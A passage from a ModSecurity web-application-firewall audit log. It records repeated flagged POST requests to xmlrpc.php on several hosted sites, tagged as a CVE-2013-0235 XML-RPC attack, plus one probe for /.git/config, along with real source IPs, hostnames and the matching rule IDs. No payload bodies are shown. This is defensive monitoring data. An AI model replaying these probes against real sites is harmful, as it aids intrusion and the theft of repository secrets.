alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8B80mAj8yxyFrMChh0IgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008307015919 953604 (- - -) Stopwatch2: 1750008307015919 953604; combined=2440, p1=397, p2=1529, p3=55, p4=81, p5=237, sr=108, sw=141, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a3f47172-Z-- --ef848546-A-- [15/Jun/2025:22:55:49.633333 +0530] aE8CHRLQPChAjmM6-0i9-wAAAAQ 183.56.195.106 47146 127.0.0.1 7081 --ef848546-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --ef848546-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --ef848546-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (49+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (49+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8CHRLQPChAjmM6-0i9-wAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008349343182 290227 (- - -) Stopwatch2: 1750008349343182 290227; combined=2060, p1=357, p2=1257, p3=86, p4=47, p5=193, sr=110, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef848546-Z-- --14ae2400-A-- [15/Jun/2025:22:55:51.207222 +0530] aE8CHjtuDRGAAnNiXIelawAAAAg 124.109.12.110 47218 127.0.0.1 7081 --14ae2400-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --14ae2400-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --14ae2400-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8CHjtuDRGAAnNiXIelawAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008350901910 305383 (- - -) Stopwatch2: 1750008350901910 305383; combined=2384, p1=404, p2=1565, p3=74, p4=48, p5=178, sr=126, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --14ae2400-Z-- --a2f93c01-A-- [15/Jun/2025:22:56:08.776544 +0530] aE8CL0mAj8yxyFrMChh0PwAAAAE 128.199.112.101 57168 127.0.0.1 7081 --a2f93c01-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a2f93c01-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a2f93c01-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8CL0mAj8yxyFrMChh0PwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008367844757 931853 (- - -) Stopwatch2: 1750008367844757 931853; combined=2227, p1=334, p2=1439, p3=45, p4=60, p5=216, sr=90, sw=133, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a2f93c01-Z-- --230e0c2b-A-- [15/Jun/2025:22:56:49.543532 +0530] aE8CWTtuDRGAAnNiXIeligAAAAg 183.56.195.106 34856 127.0.0.1 7081 --230e0c2b-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --230e0c2b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --230e0c2b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (48+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (48+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8CWTtuDRGAAnNiXIeligAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008409246867 296739 (- - -) Stopwatch2: 1750008409246867 296739; combined=2141, p1=362, p2=1321, p3=94, p4=43, p5=197, sr=100, sw=124, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --230e0c2b-Z-- --2e19a62b-A-- [15/Jun/2025:22:57:09.073741 +0530] aE8CbBLQPChAjmM6-0i-IwAAAAQ 128.199.112.101 55836 127.0.0.1 7081 --2e19a62b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 502 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2e19a62b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2e19a62b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8CbBLQPChAjmM6-0i-IwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008428065135 1008663 (- - -) Stopwatch2: 1750008428065135 1008663; combined=2191, p1=387, p2=1366, p3=47, p4=71, p5=200, sr=105, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2e19a62b-Z-- --0364990a-A-- [15/Jun/2025:22:57:49.861821 +0530] aE8ClV-LYq7Bs5L9UHpa3gAAAAM 124.109.12.110 36328 127.0.0.1 7081 --0364990a-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 703 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0364990a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --0364990a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8ClV-LYq7Bs5L9UHpa3gAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008469558228 303667 (- - -) Stopwatch2: 1750008469558228 303667; combined=2411, p1=376, p2=1645, p3=60, p4=49, p5=174, sr=106, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0364990a-Z-- --8e49ce49-A-- [15/Jun/2025:22:57:50.595633 +0530] aE8ClhLQPChAjmM6-0i-NwAAAAQ 183.56.195.106 36362 127.0.0.1 7081 --8e49ce49-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --8e49ce49-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --8e49ce49-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (55+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (55+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8ClhLQPChAjmM6-0i-NwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008470304837 290887 (- - -) Stopwatch2: 1750008470304837 290887; combined=2461, p1=376, p2=1538, p3=100, p4=56, p5=242, sr=106, sw=149, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8e49ce49-Z-- --8e0efd14-A-- [15/Jun/2025:22:58:09.513363 +0530] aE8CqDtuDRGAAnNiXIelrwAAAAg 128.199.112.101 48434 127.0.0.1 7081 --8e0efd14-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --8e0efd14-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8e0efd14-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8CqDtuDRGAAnNiXIelrwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008488580257 933162 (- - -) Stopwatch2: 1750008488580257 933162; combined=2373, p1=358, p2=1608, p3=44, p4=66, p5=183, sr=95, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8e0efd14-Z-- --199fb476-A-- [15/Jun/2025:22:58:50.846525 +0530] aE8C0r59833JshVCMq_g4gAAAAY 183.56.195.106 45084 127.0.0.1 7081 --199fb476-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --199fb476-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --199fb476-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (50+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (50+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8C0r59833JshVCMq_g4gAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008530561166 285438 (- - -) Stopwatch2: 1750008530561166 285438; combined=2036, p1=324, p2=1282, p3=73, p4=85, p5=170, sr=88, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --199fb476-Z-- --6ec96258-A-- [15/Jun/2025:22:59:09.618083 +0530] aE8C5EmAj8yxyFrMChh0nwAAAAE 128.199.112.101 47244 127.0.0.1 7081 --6ec96258-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6ec96258-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6ec96258-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8C5EmAj8yxyFrMChh0nwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008548652386 965777 (- - -) Stopwatch2: 1750008548652386 965777; combined=2421, p1=401, p2=1529, p3=58, p4=95, p5=211, sr=132, sw=127, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ec96258-Z-- --92bd972a-A-- [15/Jun/2025:22:59:17.078260 +0530] aE8C7UmAj8yxyFrMChh0qgAAAAE 35.236.216.236 54428 127.0.0.1 7081 --92bd972a-B-- GET /.git/config HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 35.236.216.236 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip --92bd972a-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --92bd972a-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/.git/config"] [unique_id "aE8C7UmAj8yxyFrMChh0qgAAAAE"] Stopwatch: 1750008557075456 2854 (- - -) Stopwatch2: 1750008557075456 2854; combined=1575, p1=358, p2=1164, p3=0, p4=0, p5=53, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92bd972a-Z-- --3e22483c-A-- [15/Jun/2025:22:59:50.747054 +0530] aE8DDmCPauOs0aEe3c0_9wAAAAI 183.56.195.106 44958 127.0.0.1 7081 --3e22483c-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --3e22483c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --3e22483c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (38+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (38+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8DDmCPauOs0aEe3c0_9wAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008590464914 282217 (- - -) Stopwatch2: 1750008590464914 282217; combined=2068, p1=375, p2=1237, p3=100, p4=45, p5=192, sr=112, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3e22483c-Z-- --1e955156-A-- [15/Jun/2025:23:00:09.565334 +0530] aE8DILv7QZcuXaML92AvygAAAAU 128.199.112.101 33038 127.0.0.1 7081 --1e955156-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1e955156-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1e955156-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8DILv7QZcuXaML92AvygAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008608623735 941665 (- - -) Stopwatch2: 1750008608623735 941665; combined=2555, p1=457, p2=1697, p3=43, p4=74, p5=178, sr=130, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e955156-Z-- --835a5c16-A-- [15/Jun/2025:23:00:50.463253 +0530] aE8DSpIGHJmWDi7BX1VrWAAAAAA 183.56.195.106 52040 127.0.0.1 7081 --835a5c16-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --835a5c16-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --835a5c16-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (44+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (44+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id 